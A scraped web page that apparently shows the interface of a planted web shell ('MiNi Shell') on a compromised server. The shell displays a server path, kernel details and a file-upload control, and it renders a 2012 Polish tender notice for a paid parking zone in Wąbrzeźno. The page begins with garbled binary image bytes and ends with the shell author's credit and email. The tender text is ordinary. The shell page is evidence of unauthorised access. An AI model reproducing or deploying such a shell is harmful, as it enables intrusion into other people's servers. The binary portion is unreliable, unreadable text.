JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121122/465238-N-2012.html

<p class="kh_header"><b>Wąbrzeźno: Zorganizowanie i  zarządzanie Strefą Płatnego Parkowania w Wąbrzeźnie</b><br>
<b>Numer ogłoszenia: 465238 - 2012; data zamieszczenia: 22.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Wąbrzeźno , ul. Wolności 18, 87-200 Wąbrzeźno, woj. kujawsko-pomorskie, tel. 56 6884500, faks 56 688 27 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wabrzezno.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i  zarządzanie Strefą Płatnego Parkowania w Wąbrzeźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia musi być realizowany zgodnie z Uchwałą Nr XXXIII/166/12 Rady Miasta Wąbrzeźno z 27 września 2012 r. w sprawie ustalenia strefy płatnego parkowania na terenie Gminy Miasto Wąbrzeźno oraz wysokości opłat za parkowanie
i sposobu ich pobierania , która stanowi integralną część specyfikacji.    
Przedmiot zamówienia obejmuje:
A. W ramach zorganizowania SPP:
1. Opracowanie projektu lokalizacji urządzeń parkingowych (parkomatów) w SPP na terenie Wąbrzeźna  zgodnie z Uchwałą oraz obowiązującymi w tym zakresie przepisami prawa wraz z uzyskaniem wszystkich niezbędnych uzgodnień 
i pozwoleń oraz akceptacji Zamawiającego. Suma parkomatów nie może być mniejsza niż 10. Należy uwzględnić wymóg, aby widoczność wyświetlanych informacji w parkomatach była bardzo dobra i niezależna od warunków pogodowych, pory roku i nasłonecznienia.
2. Wykonanie i przedłożenie Zamawiającemu do zatwierdzenia dokumentacji projektowej w zakresie rozmieszczenia i oznakowania poziomego oraz pionowego miejsc parkingowych tworzących SPP wraz z projektem organizacji ruchu. Dokumentacja projektowa wymaga uzyskania stosownych zatwierdzeń, zgodnie z obowiązującymi przepisami.
3. Wykonanie oznakowania pionowego i poziomego zgodnego z istniejącym oznakowaniem pod kątem tworzenia płatnych, niestrzeżonych parkingów dla pojazdów samochodowych (oznakowanie pionowe, poziome oraz  dodatkowe tabliczki informacyjne zamontowane przy parkomatach na słupkach o wysokości min. 2,20 m) z wyłączeniem oznakowania poziomego w obszarze rewitalizacji: Plac Jana Pawła II, ul. Poniatowskiego (od nr 12 do ul. Mestwina), ul. Kościuszki (od Pl. Jana Pawła II do ul. Mestwina), ul. 1 Maja (od Pl. Jana Pawła II do ul. Mestwina). Wykonawca jest zobowiązany do zapewnienia 10 % miejsc parkingowych dla osób niepełnosprawnych.
4. Urządzenie i wyposażenie SPP zgodnie z zatwierdzoną dokumentacją i złożoną ofertą. 
5. Dostawę, wyposażenie, skonfigurowanie i uruchomienie w SPP parkomatów jednego typu i koloru w ilości niezbędnej do prawidłowego funkcjonowania strefy, w tym minimum dwa parkomaty z tzw. informacją turystyczną, zgodnie
z zatwierdzonym przez Zamawiającego projektem lokalizacji parkomatów. Zamawiający dopuszcza urządzenia używane po konserwacji i renowacji, które
są w bardzo dobrym stanie technicznym. W trakcie realizacji zamówienia i po jego zakończeniu urządzenia te wraz z oprogramowaniem stanowić będą własność  wykonawcy. Należy pamiętać, że montaż parkomatów w tzw. strefie zrewitalizowanej musi odbywać się po zgłoszeniu i uzgodnieniu tych prac z Firmą PRASBET z Grudziądza, która była wykonawcą rewitalizacji Placu Jana Pawła II w Wąbrzeźnie i do września 2014 r. jest gwarantem wykonanych robót.    
6. Dostawę i montaż nowoczesnego systemu poboru opłat oraz nowoczesnego oprogramowania komputerowego do sprawowania zarządu i nadzoru nad funkcjonowaniem SPP oraz pobieraniem opłat parkingowych. 
7. Koordynowanie organizacji SPP, w szczególności: wykonawstwa, działań ewentualnych podwykonawców, dostawy i montażu materiałów, maszyn
i urządzeń, potrzebnych do realizacji zamówienia, stosowania wyrobów dopuszczonych do obrotu i powszechnego lub jednostkowego stosowania na podstawie odrębnych przepisów, wykonania zadań związanych
z przeprowadzeniem zagospodarowania terenów parkingowych, wykonania wszelkich prac związanych z dostosowaniem terenu SPP do jej właściwego funkcjonowania, wykonania wszystkich niezbędnych prób, pomiarów, rozruchu, utworzenia i wyposażenia biura SPP;
8. Uruchomienie dodatkowego systemu poboru opłat za parkowanie za pomocą (bezpłatnego dla użytkowników SPP) systemu płatności mobilnych, który będzie funkcjonował równolegle z systemem poboru opłat za parkowanie za pomocą parkomatów;
9. Urządzenie biura obsługi SPP w jej obszarze wraz z centrum przetwarzania danych, zwanego dalej CPD  monitorującym funkcjonowanie SPP, z pełnym oprogramowaniem w języku polskim, umożliwiającym wydruk statystyk, raportów dziennych i innych danych, zintegrowanych systemowo z komputerem w jednostce Zamawiającego, punktem informacyjnym i sprzedaży abonamentów. W trakcie realizacji zamówienia i po jego zakończeniu urządzenia urządzenia stanowiące wyposażenie biura wraz z oprogramowaniem stanowić będą własność  wykonawcy.
10.  Lokalizacja biura SPP wymagać będzie uprzedniej akceptacji Zamawiającego.
11. Wyposażenie SPP w odpowiednią ilość urządzeń do opróżniania skarbców (kaset) pozwalające na identyfikację wpływów z każdego parkomatu.
12. Umożliwienie Zamawiającemu udziału przy opróżnianiu skarbców, pozwalające na kontrolę wpływów z każdego parkomatu.
13. Wyposażenie Zamawiającego w zestaw komputerowy i oprogramowanie
do sprawowania nadzoru nad  funkcjonowaniem SPP oraz pobieraniem opłat parkingowych. Urządzenia te wraz z oprogramowaniem obejmujące również prawa licencyjne do jego użytkowania staną się z dniem  uruchomienia SPP własnością Zamawiającego. 
14. Przeszkolenie pracowników Zamawiającego w zakresie obsługi dostarczonego zestawu komputerowego  i  oprogramowania.


W czasie realizacji robót związanych z organizacją SPP Wykonawca zobowiązany będzie  do:
a) utrzymywania terenu SPP w stanie wolnym od przeszkód komunikacyjnych,
b) uzyskania we własnym zakresie niezbędnego pozwolenia dotyczącego podłączenia się do sieci energetycznej oraz pozostałych mediów wraz zawarciem stosownych umów;
c) ponoszenia kosztów za zużyte media w okresie od dnia podpisania umowy włączając w to okres  zarządzania SPP wraz z kosztami łączności parko matów
z serwerem;
d) naprawienia i doprowadzenia do stanu poprzedniego w przypadku zniszczenia lub uszkodzenia mienia bądź urządzeń (nawierzchnie, zieleń, uzbrojenie podziemne, znaki drogowe itp.).
B. W ramach zarządzania SPP:
1. Prowadzenie biura SPP.
2. Zorganizowanie oraz prowadzenie systemu kontroli SPP.
3. Zatrudnienie  co najmniej trzech osób do obsługi SPP.
4. Zorganizowanie opróżniania skarbców parkomatów wraz z ochroną, transportem 
i wpłatą pieniędzy na konto bankowe Zamawiającego.
5. Bieżącą obsługę naprawy oraz konserwację urządzeń parkingowych i komputerowego  centrum przetwarzania danych.
6. Naprawy oraz konserwację urządzeń i oprogramowania obsługujących SPP   zainstalowanych u Zamawiającego, przy czym Wykonawca będzie miał obowiązek odtwarzać stan ilościowy parkomatów i innych urządzeń niezbędnych do funkcjonowania SPP w przypadku zaginięcia, zniszczenia lub kradzieży. 
7. Każdorazowe uzgodnienie z Zamawiającym wzorów druków stosowanych
do obsługi SPP (np. identyfikatory,  abonamenty, bilety parkingowe, zawiadomienia o nieuiszczeniu opłaty, wydruk opłaty dodatkowej).
8. Utrzymywanie w okresie realizacji przedmiotu zamówienia urządzeń
do pobierania i rozliczania opłat parkingowych w technicznej sprawności 
z zastrzeżeniem § 9 ust 1 pkt 1,2 i 5 wzoru umowy.
C. W ramach zadań Wykonawcy związanych z bieżącą eksploatacją urządzeń sytemu płatnego parkowania:
1. Usuwanie niezwłocznie, najpóźniej w ciągu 2 godzin od stwierdzenia awarii parkomatów lub wymianie do 24 godzin niesprawnych urządzeń. Termin
do 2 godzin dotyczy uszkodzeń, które ze względów technicznych mogą być usunięte bez demontażu urządzenia z ulicy (poprzez wymianę modułów lub naprawę podzespołów na miejscu). Awarie będą stwierdzane na podstawie danych docierających z parkomatów do CPD i Zamawiającego lub na podstawie zgłoszenia przez pracowników Zamawiającego (lub  jakąkolwiek inną osobę, która stwierdzi awarię urządzenia i zgłosi ten fakt u Zamawiającego lub w Biurze SPP).
2. Usuwanie awarii pozostałych urządzeń i systemu informatycznego najpóźniej 
w ciągu 2 godzin od stwierdzenia awarii lub ich wymiana do 24 godzin.
3. Zagwarantowanie nieodpłatnych dostaw części zamiennych od producenta urządzeń do pobierania i rozliczania opłat parkingowych oraz wszelkich materiałów eksploatacyjnych w okresie realizacji przedmiotu zamówienia. 
4. Dostosowanie systemu do zmieniających się przepisów prawa, w tym, w szczególności, do zmian prawa miejscowego w zakresie dotyczącym SPP.
5. Czyszczenie i utrzymanie urządzeń w  estetycznym stanie, usuwanie szkód spowodowanych wandalizmem i kradzieżą.
6. Koordynowanie napraw i prac serwisowo-naprawczych.
7. Utrzymanie w dobrym stanie, odnawianie, bieżąca konserwacja oznakowania pionowego i poziomego SPP oraz oznakowania informacyjnego.
8. Kontrola czytelności i kompletności oznakowania.
9. Inne czynności wynikających z prowadzenia biura obsługi klientów i kontroli (rozpatrywanie reklamacji, przyjmowanie zgłoszeń dotyczących funkcjonowania SPP, itp.);
10. Współpraca ze Strażą Miejską i Policją.
D. Inne zadania Wykonawcy, takie jak:
1. Pobieranie opłat za parkowanie przy wykorzystaniu parkomatów zainstalowanych w SPP oraz opłat dodatkowych określonych uchwałą.
2. Dystrybucję i ewidencjonowanie sprzedaży abonamentów.
3. Przyjmowanie reklamacji zgodnie z uchwałą. 
4. Informowanie użytkowników SPP o zasadach jej funkcjonowania. 
5. Bieżące aktualizowanie danych odebranych z parkomatów, a także wezwań do wniesienia opłaty dodatkowej, ich archiwizowanie oraz ewidencjonowanie.
6. Tworzenie niezbędnej dokumentacji do prawidłowego wykonania zamówienia,
w tym m.in. zestawień, informacji dla zarządcy drogi, protokołów miesięcznych, statystyki, informacji okresowych, prowadzenie korespondencji z użytkownikami SPP, itp.
7. Przekazywanie Zamawiającemu aktualnej bazy wystawionych wezwań do zapłaty opłat za postój i opłat dodatkowych,  nie rzadziej niż raz w miesiącu.
8. Zorganizowanie opróżniania parkomatów z utargu według potrzeb (co najmniej raz na dwa tygodnie) na własny koszt i własne ryzyko. Wykonawca odpowiadać będzie za bezpieczeństwo transportu gotówki oraz za niedobory z poszczególnych kolekcji.
9. Wpłacanie na rachunek bankowy Zamawiającego pieniędzy z opróżnionych parkomatów oraz pozostałych wpływów w ciągu 48 godzin od ich pobrania. Rozliczenie całości wpływów nastąpi  do 5-tego dnia miesiąca następnego
za miesiąc poprzedni.
10. Przedkładanie Zamawiającemu raportu z przychodów osiągniętych z SPP
za każdy miesiąc do 5-tego dnia miesiąca następnego za miesiąc poprzedni.
11. Kontrolę czasu postoju pojazdów w SPP.
12.  Przekazywanie Zamawiającemu informacji dotyczących wyników kontroli,
o której mowa w pkt 11 raz na dwa tygodnie wraz z cyfrową dokumentacją fotograficzną (dwa  zdjęcia pojazdu).
Wykonawca zobowiązany będzie wykonać przedmiot zamówienia z materiałów własnych. Materiały muszą spełniać wymagania określone w Polskich Normach (m.in. w zakresie   bezpieczeństwa, odporności na uszkodzenia mechaniczne)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o jakich mowa w art. 67 ust. 1 pkt. 6 Pzp. Zamówienia uzupełniające polegać będą na wyposażeniu strefy płatnego parkowania 
w Wąbrzeźnie w urządzenia parkingowe oraz włączeniu ich do centrum przetwarzania danych wraz z ich obsługą i utrzymaniem na nowych terenach, jeżeli Rada Miasta Wąbrzeźno podejmie uchwałę o rozszerzeniu obszaru strefy. Wielkość zamówień uzupełniających nie będzie mogła przekroczyć 45 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.71.24.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium 
w kwocie: 10.000,00 PLN (słownie złotych: dziesięć tysięcy  ).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami fizycznymi, osobami prawnymi lub jednostkami organizacyjnymi nieposiadającymi osobowości prawnej, a także wykonawcy ci występujący wspólnie ( spółka cywilna i konsorcjum) , spełniający warunki określone w ustawie Prawo zamówień publicznych - Pzp oraz SIWZ. Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone w art. 22 Pzp i nie podlagać wykluczeniu na podstawie art. 24 Pzp. 
Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawcę
do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiając nie precyzuje tego warunku. Potwierdzeniem spełniania tego warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawcę
do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiając nie precyzuje tego warunku. Potwierdzeniem spełniania tego warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawcę
do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiając nie precyzuje tego warunku. Potwierdzeniem spełniania tego warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawcę
do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiając nie precyzuje tego warunku. Potwierdzeniem spełniania tego warunku będzie oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Pzp. 
Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez wykonawcę
do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Pzp. dopuszcza zmiany zawartej umowy. 
Zamawiający dopuszcza zmiany załącznika nr 3 do umowy, tj. uchwały Rady Miasta Wąbrzeźno Nr XXIII/166/12 z dnia 27 września 2012 r. w sprawie ustalenia stref płatnego parkowania na    terenie  Gminy Miasto Wąbrzeźno oraz wysokości opłat za parkowanie i sposobu ich pobierania tylko w zakresie wysokości opłat za parkowanie pojazdów w SPP w Wąbrzeźnie oraz Regulaminu SPP</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.wabrzezno.com/portal.php?aid=11999501444785c940db911<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Wąbrzeźno, Wydział Gospodarki Komunalnej i Mieszkaniowej, ul. Wolności 18, 87-200 Wąbrzeźno..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2012 godzina 10:00, miejsce: Oferty należy składać w: Urzędzie Miasta Wąbrzeźno, 87-200 Wąbrzeźno 
ul. Wolności 18, pokój Nr 20 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com